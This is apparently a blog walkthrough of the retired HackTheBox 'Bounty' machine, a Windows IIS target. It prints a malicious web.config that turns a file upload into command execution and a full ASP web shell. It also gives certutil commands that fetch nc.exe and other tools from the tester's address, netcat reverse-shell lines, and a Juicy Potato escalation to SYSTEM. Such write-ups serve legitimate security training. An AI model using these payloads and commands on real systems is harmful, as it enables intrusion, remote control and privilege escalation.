HackTheBox - Bounty - Retired - Update

HacktheBox - Bounty - retired - update

Recon

I've been using threader3000 to do my recon scans lately. It does a super quick up/down scan on all TCP ports, then suggests a nmap scan to run based just on the open ports returned from the first scan. It will save the results of the nmap scan as an XML that I then convert to HTML to make it pretty.

xsltproc ./bounty.htb/bounty.htb.xml -o ./bounty.html

Just port 80 open, nmap says its IIS 7.5.. So a windows box for a change.

Let's see what is happening when we browse to the site.

Weird just a picture of merlin from sword in the stone.

Let's try to brute force with drib and see if we can find anything interesting.

First I just did the default drib scan  and we did find a couple of interesting directories.

dirb http://bounty.htb

It found 

/aspnet_client/
/aspnet_client/system_web/
/uploadedfiles/

Unfortunately we can't browse to any of the directories, but I always love to see anything with the word upload in it.

Since this is an IIS box and it looks like it has asp running.

Let's scan again looking for some specific file types.

Like HTML, ASP, ASPX and text files

dirb http://bounty.htb -X .html,.asp,.aspx,.txt

We found this file

/transfer.aspx

Looks like a method to upload files to the server, and we did find that uploadfiles folder earlier… I told you I like seeing those

Let's try to upload picture of our favorite little monkey

Ok now lets see if we can find it in the uploadfiles directory.

We can, it hasn't even been renamed….. I wonder if we can upload a aspx webshell or reverse shell?

Exploit

I tried uploading several different types of files and got errors with HTML, XML, ASP, ASPX and all came back with Invalid File.

So when I get stuck, I usually just google what I'm up against and the word pentest to see if there are any blogs that might have a way to exploit what I'm seeing. So in this case I googled "ASPX upload pentest"

And the third results was this..

https://poc-server.com/blog/2018/05/22/rce-by-uploading-a-web-config/

In which the author uploaded a new web.config that will execute commands with aspx code inside of the web.config file.

I modified the web.config file on the site to ping back to my kali box.

<?xml version="1.0" encoding="UTF-8"?> <configuration>   <system.webServer>       <handlers accessPolicy="Read, Script, Write">         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />       </handlers>       <security>         <requestFiltering>             <fileExtensions>               <remove fileExtension=".config" />             </fileExtensions>             <hiddenSegments>               <remove segment="web.config" />             </hiddenSegments>         </requestFiltering>       </security>   </system.webServer>   <appSettings> </appSettings> </configuration> <!-- <% Response.write("-"&"->") Response.write("<pre>") Set wShell1 = CreateObject("WScript.Shell") Set cmd1 = wShell1.Exec("ping 10.10.14.9") output1 = cmd1.StdOut.Readall() set cmd1 = nothing: Set wShell1 = nothing Response.write(output1) Response.write("</pre><!-"&"-") %> -->

Then I set up tcpdump to listen for ICMP on my kali VPN IP.

sudo tcpdump -i tun0 -n icmp

Then I uploaded the web.config file using the transfer.aspx

Then when we browse to the upload at 

http://bounty.htb/uploadedfiles/web.config

Looks like we see ping results on bounty

And our listener shows it too

I found this other site that has a webshell in the web.config

https://gist.githubusercontent.com/gazcbm/ea7206fbbad83f62080e0bbbeda77d9c/raw/8173f5041c9a69cc58e980717ebe044f8eff9e9f/webshell%2520web.config

<?xml version="1.0" encoding="UTF-8"?> <configuration>   <system.webServer>       <handlers accessPolicy="Read, Script, Write">         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />               </handlers>       <security>         <requestFiltering>             <fileExtensions>               <remove fileExtension=".config" />             </fileExtensions>             <hiddenSegments>               <remove segment="web.config" />             </hiddenSegments>         </requestFiltering>       </security>   </system.webServer> </configuration> <!-- <% Response.write("-"&"->")%> <% Set oScript = Server.CreateObject("WSCRIPT.SHELL") Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") Function getCommandOutput(theCommand)     Dim objShell, objCmdExec     Set objShell = CreateObject("WScript.Shell")     Set objCmdExec = objshell.exec(thecommand)     getCommandOutput = objCmdExec.StdOut.ReadAll end Function %> <BODY> <FORM action="" method="GET"> <input type="text" name="cmd" size=45 value="<%= szCMD %>"> <input type="submit" value="Run"> </FORM> <PRE> <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %> <%Response.Write(Request.ServerVariables("server_name"))%> <p> <b>The server's port:</b> <%Response.Write(Request.ServerVariables("server_port"))%> </p> <p> <b>The server's software:</b> <%Response.Write(Request.ServerVariables("server_software"))%> </p> <p> <b>The server's software:</b> <%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%> <% szCMD = request("cmd") thisDir = getCommandOutput("cmd /c" & szCMD) Response.Write(thisDir)%> </p> <br> </BODY> <%Response.write("<!-"&"-") %> -->

Now after uploading this file and browsing to it we get this nice little webshell.

***Note there is something running here that removes this file so you need to run quickly or you will have to repeat this over and over again****

Webshells are nice but…. We need to get a better shell

We will attempt to download nc.exe to bounty and get our reverse shell that way

We are going to use use certutil.exe to download.

I start with copying nc.exe to a folder I start updog from.

So hopefully we can use certutil to download nc.exe with our webshell.

First in the webshell I make a temp folder

mkdir C:\temp

Then in the webshell we put in

certutil.exe -urlcache -f http://10.10.14.9:9090/nc.exe C:\temp\nc.exe

And updog shows that it did download nc.exe

So now we need to setup a listener to send the reverse shell to

On our kali box let's do

nc -lnvp 5555

The in our webshell we start the reverse shell

C:\temp\nc.exe 10.10.14.9 5555 -e cmd.exe

Check back on our listener.

And we have a shell as merlin.  Cool

Poking around the file system we can find the file

C:\inetpub\wwwroot\CS.aspx.cs

Here is the filter restriction for uploading file types that we came across

After poking around I didn't see the user.txt in Merlin's user folder.

Let's use updog to copy over winPEAS.bat to the bounty to see if it might show us a path toward escalation.

certutil.exe -urlcache -f http://10.10.14.9:9090/winPEAS.bat C:\temp\winPEAS.bat

Then ran that .bat file from our shell.

Not a lot of interesting results in the output other than there are a lot of patches not installed and our privileges allow for some other possible routes to escalation.

"Microsoft Windows Server 2008 R2 Datacenter " [i] Possible exploits (https://github.com/codingo/OSCP-2/blob/master/Windows/WinPrivCheck.bat) No Instance(s) Available. MS11-080 patch is NOT installed! (Vulns: XP/SP3,2K3/SP3-afd.sys) No Instance(s) Available. MS16-032 patch is NOT installed! (Vulns: 2K8/SP1/2,Vista/SP2,7/SP1-secondary logon) No Instance(s) Available. MS11-011 patch is NOT installed! (Vulns: XP/SP2/3,2K3/SP2,2K8/SP2,Vista/SP1/2,7/SP0-WmiTraceMessageVa) No Instance(s) Available. MS10-59 patch is NOT installed! (Vulns: 2K8,Vista,7/SP0-Chimichurri) No Instance(s) Available. MS10-21 patch is NOT installed! (Vulns: 2K/SP4,XP/SP2/3,2K3/SP2,2K8/SP2,Vista/SP0/1/2,7/SP0-Win Kernel) No Instance(s) Available. MS10-092 patch is NOT installed! (Vulns: 2K8/SP0/1/2,Vista/SP1/2,7/SP0-Task Sched) No Instance(s) Available. MS10-073 patch is NOT installed! (Vulns: XP/SP2/3,2K3/SP2/2K8/SP2,Vista/SP1/2,7/SP0-Keyboard Layout) No Instance(s) Available. MS17-017 patch is NOT installed! (Vulns: 2K8/SP2,Vista/SP2,7/SP1-Registry Hive Loading) No Instance(s) Available. MS10-015 patch is NOT installed! (Vulns: 2K,XP,2K3,2K8,Vista,7-User Mode to Ring) No Instance(s) Available. MS08-025 patch is NOT installed! (Vulns: 2K/SP4,XP/SP2,2K3/SP1/2,2K8/SP0,Vista/SP0/1-win32k.sys) No Instance(s) Available. MS06-049 patch is NOT installed! (Vulns: 2K/SP4-ZwQuerySysInfo) No Instance(s) Available. MS06-030 patch is NOT installed! (Vulns: 2K,XP/SP2-Mrxsmb.sys) No Instance(s) Available. MS05-055 patch is NOT installed! (Vulns: 2K/SP4-APC Data-Free) No Instance(s) Available. MS05-018 patch is NOT installed! (Vulns: 2K/SP3/4,XP/SP1/2-CSRSS) No Instance(s) Available. MS04-019 patch is NOT installed! (Vulns: 2K/SP2/3/4-Utility Manager) No Instance(s) Available. MS04-011 patch is NOT installed! (Vulns: 2K/SP2/3/4,XP/SP0/1-LSASS service BoF) No Instance(s) Available. MS04-020 patch is NOT installed! (Vulns: 2K/SP4-POSIX) No Instance(s) Available. MS14-040 patch is NOT installed! (Vulns: 2K3/SP2,2K8/SP2,Vista/SP2,7/SP1-afd.sys Dangling Pointer) No Instance(s) Available. MS16-016 patch is NOT installed! (Vulns: 2K8/SP1/2,Vista/SP2,7/SP1-WebDAV to Address) No Instance(s) Available. MS15-051 patch is NOT installed! (Vulns: 2K3/SP2,2K8/SP2,Vista/SP2,7/SP1-win32k.sys) No Instance(s) Available. MS14-070 patch is NOT installed! (Vulns: 2K3/SP2-TCP/IP) No Instance(s) Available. MS13-005 patch is NOT installed! (Vulns: Vista,7,8,2008,2008R2,2012,RT-hwnd_broadcast) No Instance(s) Available. MS13-053 patch is NOT installed! (Vulns: 7SP0/SP1_x86-schlamperei) No Instance(s) Available. MS13-081 patch is NOT installed! (Vulns: 7SP0/SP1_x86-track_popup_menu)

Since we have seimpersonateprivilege rights… if you aren't familiar with the potato exploits you might check them out.

This is usually a privilege that service accounts have, what this basically does at the end of the day is allow this user to run things as other users, it accomplishes this by impersonating tokens running other processes…. Which is super handy 

So we can try to leverage Juicy Potato to get command execution as system.

First I download JuicyPotatoe.exe to my kali box

https://github.com/ohpe/juicy-potato/releases

Then use updog and certutil to download it to bounty.

certutil.exe -urlcache -f http://10.10.14.9:9090/JuicyPotato.exe C:\temp\JuicyPotato.exe

Then we need to identify a CLSID to get the program to run as

https://github.com/ohpe/juicy-potato/tree/master/CLSID/Windows_Server_2008_R2_Enterprise

I tried wuauserv first but it didn't work so let's use winmgt which 

So hopefully with Juicy potato we can tell it what process to run as the user we are impersonating. I want a reverse shell as SYSTEM, so I made a bat file on bounty with this as the contents to create a new reverse shell.

echo C:\temp\nc.exe 10.10.14.9 5566 -e cmd.exe > RShell.bat

Let's start our listener for our new reverse shell

nc -lnvp 5566

Then we call it using JuicyPotato.exe using the CLSID of winmgmt

JuicyPotato.exe -l 1337 -p C:\temp\RShell.bat -t * -c {C49E32C6-BC8B-11d2-85D4-00105A1F8304}

Now we will check back on our new reverse shell.

Winner, winner we got System.

We should be able to get our flags now

I still didn't see user.txt in Merlin's desktop folder. I eventually found a hidden file with the attrib cmd